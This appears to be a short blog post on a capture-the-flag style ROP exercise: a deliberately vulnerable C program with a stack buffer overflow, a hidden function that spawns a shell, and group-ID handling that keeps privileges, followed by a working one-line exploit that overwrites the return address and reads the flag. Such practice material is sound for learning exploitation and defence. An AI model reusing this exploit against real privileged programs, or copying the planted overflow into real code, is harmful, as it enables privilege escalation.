# cat blog >> /dev/brain 2> /proc/mind
cat blog >> /dev/brain 2> /proc/mind
$ cat rop1.c
// rop1.c - a deliberately vulnerable practice program. It reads from stdin
// into a fixed-size stack buffer with a length larger than the buffer, then
// prints a greeting. The comments below describe the defect and how it would
// be fixed in production code.

// Removes any _FORTIFY_SOURCE definition before the libc headers are
// included, so the fortified (bounds-checked) libc wrappers are not selected
// for this translation unit. Production builds should leave fortification on.
#undef _FORTIFY_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// Runs /bin/bash through system() and returns system()'s status.
// Nothing in this file calls this function.
int not_called() {
    return system("/bin/bash");
}

// Reads from stdin into a 128-byte stack buffer while telling read() it may
// store up to 256 bytes.
void vulnerable_function() {
    char buf[128];
    // DEFECT (stack-based buffer overflow, CWE-121): the length argument is
    // twice the size of buf, so any input longer than 128 bytes is written
    // past the end of the array into adjacent stack memory. On a typical
    // stack layout that includes saved registers and the return address.
    // The fix is read(STDIN_FILENO, buf, sizeof buf) plus a check of the
    // return value, which is ignored here. Compiler and OS hardening (stack
    // protector, PIE/ASLR) reduce the impact but do not remove the bug.
    read(STDIN_FILENO, buf, 256);
}

// Sets the real, effective and saved group IDs all to the current effective
// group ID.
void be_nice_to_people() {
    // Original author's note: /bin/sh is usually symlinked to bash, which
    // usually drops privileges. Making the three gids equal ensures
    // privileges are not dropped if bash is exec'd, i.e. if system() is
    // called.
    // NOTE(review): the setresgid() return value is not checked.
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
}

// Entry point: fixes up the group IDs, performs the unbounded read, then
// writes the 13-byte greeting to stdout. argc and argv are unused, and there
// is no explicit return (C99 and later treat falling off main as return 0).
int main(int argc, char** argv) {
    be_nice_to_people();
    vulnerable_function();
    write(STDOUT_FILENO, "Hello, World\n", 13);
}
$ (python -c 'print "\x90"*140 + "\xa4\x84\x04\x08"'; cat) | ./rop1
cat key
rops_on_rops_on_rops
cat rop1.c
(python -c 'print "\x90"*140 + "\xa4\x84\x04\x08"'; cat) | ./rop1
cat key